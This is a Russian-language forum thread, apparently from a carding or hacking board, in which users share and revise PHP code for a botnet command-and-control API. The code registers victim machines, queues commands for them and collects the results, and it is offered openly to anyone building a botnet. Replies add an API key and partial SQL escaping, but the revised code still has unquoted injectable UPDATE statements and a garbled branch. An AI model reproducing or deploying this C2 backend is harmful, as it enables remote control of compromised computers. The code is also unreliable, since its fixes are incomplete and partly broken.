1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

BOTNET API

Тема в разделе "Программирование", создана пользователем K_NoW, 26 апр 2015.

  1. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Если ктото надумает писать ботнет, тогда мой кодес облегчит вам кодинг:
    Код:
    <?php
    $db = sqlite_open("users.db");
    $par =$_GET;
    
    if ($par['mod'] == 'list') {
    $result = sqlite_query($db, "SELECT * FROM users");
    while ($row = sqlite_fetch_array($result)) {
    echo json_encode($row);
    }
    }
    
    if ($par['mod'] == 'regb') {
    sqlite_query($db, "INSERT INTO users (
    id,
    pcname,
    uname,
    windows,
    lastvisit,
    fistvisit,
    comm,
    commres)
    VALUES
    ('".$par['id']."',
    '".$par['pcname']."',
    '".$par['uname']."',
    '".$par['windows']."',
    '".$par['lastvisit']."',
    '".$par['fistvisit']."',
    '".$par['comm']."',
    '".$par['commres']."
    ')
    ");
    }
    
    
    if ($par['mod'] == 'rcmd') {
    $result = sqlite_query($db, "SELECT comm FROM users WHERE id='".$par['id']."'");
    if (!$row = sqlite_fetch_array($result)) {
    echo "noreg";
    } else {
    echo $row[0];
    }
    }
    
    if ($par['mod'] == 'rrcmd') {
    $result = sqlite_query($db, "SELECT commres FROM users WHERE id='".$par['id']."'");
    while ($row = sqlite_fetch_array($result)) {
    echo $row[0];
    }
    }
    
    if ($par['mod'] == 'srcmd') {
    sqlite_query($db, "UPDATE users SET commres=".$par['dat']." WHERE id='".$par['id']."'");
    }
    
    
    if ($par['mod'] == 'scmd') {
    sqlite_query($db, "UPDATE users SET comm=".$par['dat']." WHERE id='".$par['id']."'");
    }
    
    if ($par['mod'] == 'spar') {
    sqlite_query($db, "UPDATE users SET ".$par['par']."=".$par['dat']." WHERE id='".$par['id']."'");
    }
    
    if ($par['mod'] == 'delb') {
    sqlite_query($db, "
    DELETE FROM users WHERE id='".$par['id']."'
    ");
    }
    
    sqlite_close($db);
    
    /*
    sqlite_query($db, "CREATE TABLE users (id CHAR(255), pcname CHAR(255),uname CHAR(255),windows CHAR(255),lastvisit CHAR(255),fistvisit CHAR(255),comm CHAR(255),commres CHAR(255))");
    */
    ?>
    
    
    
    Работает с базой скуллайт
    Вобщем кому нужно тот разберется.
     
    • Like Like x 3
    Метки:
  2. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Это
    $par =$_GET;
    Поменяйте на это
    $par =$_POST;
    и передавайте параметры пост запросом
     
  3. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    А users.db скинуть (пустую) не надо?)
    --- Добавил сообщение, 26 апр 2015 ---
    $par меняем на $_REQUEST и будет принимать GET и POST запросы.
    Насчет запросов SQL... ВЫ ЧТО С УМА СОШЛИ? ЭТО ОСНОВЫ БЕЗОПАСНОСТИ!!!
    Please login or register to view links - поможет защититься от разных sql-inj...
    К примеру:
    $result = sqlite_query($db, "SELECT commres FROM users WHERE id='".$par['id']."'");
    заменяем на
    $result = sqlite_query($db, "SELECT commres FROM users WHERE id='" . sqlite_escape_string($par['id']) . "'");
    ВСЕ! Уязвимости нету!!!
    и ещё...
    советую добавить в начало кода:
    PHP:
    if ($_REQUEST['apikey'] != "MY_API_KEY") exit("Wrong api key");
    Где MY_API_KEY - ваш уникальный ключ...
    Теперь обращаемся не script.php?mod=list, а script.php?apikey=MY_API_KEY&mod=list
    При неверном ключе выдаст Wrong api key

    Ну, а насчет RewriteRule, я промолчу...
     
    • Like Like x 1
    Последнее редактирование: 26 апр 2015
  4. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    База users.db при отсутствии будет создана автоматом, чтобы создать таблицу раскометруем код в конце, про REQUEST не знал. Про апи кей, просто не успел добавить, всегда подобное делаю в своих скриптах.
     
  5. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    уязв исправь)
    И нормализируй код. Могу сам сделать
     
  6. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    давай. нормализируй это как? добавить форматирование чёли. сам делаю но сетка нагружена, даже к фтп немогу коннект зделать.
     
  7. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    PHP:
    <?php
    if ($_REQUEST['apikey'] != "MY_API_KEY") exit("Wrong api key");
    if(!
    function_exists("sqlite_open")) exit("Script error");
    $dbFileName "users.db";
    $db sqlite_open("users.db");
    if(!
    file_exists($dbFileName))     sqlite_query($db"CREATE TABLE users (id CHAR(255), pcname CHAR(255),uname CHAR(255),windows CHAR(255),lastvisit CHAR(255),fistvisit CHAR(255),comm CHAR(255),commres CHAR(255))");

    foreach(
    $_REQUEST as $key=>$value) {
        
    $_REQUEST[$key] = sqlite_escape_string($value);
    }
    if (
    $_REQUEST['mod'] == 'list') {
        
    $result sqlite_query($db"SELECT * FROM users");
        while (
    $row sqlite_fetch_array($result)) {
            echo 
    json_encode($row);
        }
    }

    if (
    $_REQUEST['mod'] == 'regb') {
        
    sqlite_query($db"INSERT INTO users (id,pcname,uname,windows,lastvisit,fistvisit,comm,commres) VALUES (
        '"
    .$_REQUEST['id']."',
        '"
    .$_REQUEST['pcname']."',
        '"
    .$_REQUEST['uname']."',
        '"
    .$_REQUEST['windows']."',
        '"
    .$_REQUEST['lastvisit']."',
        '"
    .$_REQUEST['fistvisit']."',
        '"
    .$_REQUEST['comm']."',
        '"
    .$_REQUEST['commres']."
        ')
        "
    );
    }

    if (
    $_REQUEST['mod'] == 'rcmd') {
        
    $result sqlite_query($db"SELECT comm FROM users WHERE id='".$_REQUEST['id']."'");
        if (!
    $row sqlite_fetch_array($result)) {
            echo 
    "noreg";
        } else {
            echo 
    $row[0];
        }
    }

    if (
    $_REQUEST['mod'] == 'rrcmd') {
        
    $result sqlite_query($db"SELECT commres FROM users WHERE id='".$_REQUEST['id']."'");
        while (
    $row sqlite_fetch_array($result)) {
            echo 
    $row[0];
        }
    }

    if (
    $_REQUEST['mod'] == 'srcmd') {
        
    sqlite_query($db"UPDATE users SET commres=".$_REQUEST['dat']." WHERE id='".$_REQUEST['id']."'");
    }


    if (
    $_REQUEST['mod'] == 'scmd') {
        
    sqlite_query($db"UPDATE users SET comm=".$_REQUEST['dat']." WHERE id='".$_REQUEST['id']."'");
    }

    if (
    $_REQUEST['mod'] == 's_REQUEST') {
        
    sqlite_query($db"UPDATE users SET ".$_REQUEST['_REQUEST']."=".$_REQUEST['dat']." WHERE id='".$_REQUEST['id']."'");
    }

    if (
    $_REQUEST['mod'] == 'delb') {
        
    sqlite_query($db"DELETE FROM users WHERE id='".$_REQUEST['id']."'");
    }

    sqlite_close($db);
    ?>
    Вот исправленный и оптимизированный код....
     
    • Like Like x 2
    Последнее редактирование: 27 апр 2015
  8. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    1. Fwrite вызывать не нужен, ты язвы забыл закрыть.
     
  9. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    Fopen нужен для создания файла.
     
    Последнее редактирование модератором: 8 июн 2015
  10. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Если файла с бозой нет, sqlite-open создаст сам.
     
    Последнее редактирование модератором: 8 июн 2015
  11. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    Прости, не знал...
    С SQLite не работал почти)))
     
  12. naiv

    naiv

    Регистрация:
    14 май 2016
    Сообщения:
    23
    Симпатии:
    0
    ТС а можно увидеть пример твоих готовых работ? мозгов лс за печеньки
     

Поделиться этой страницей

Загрузка...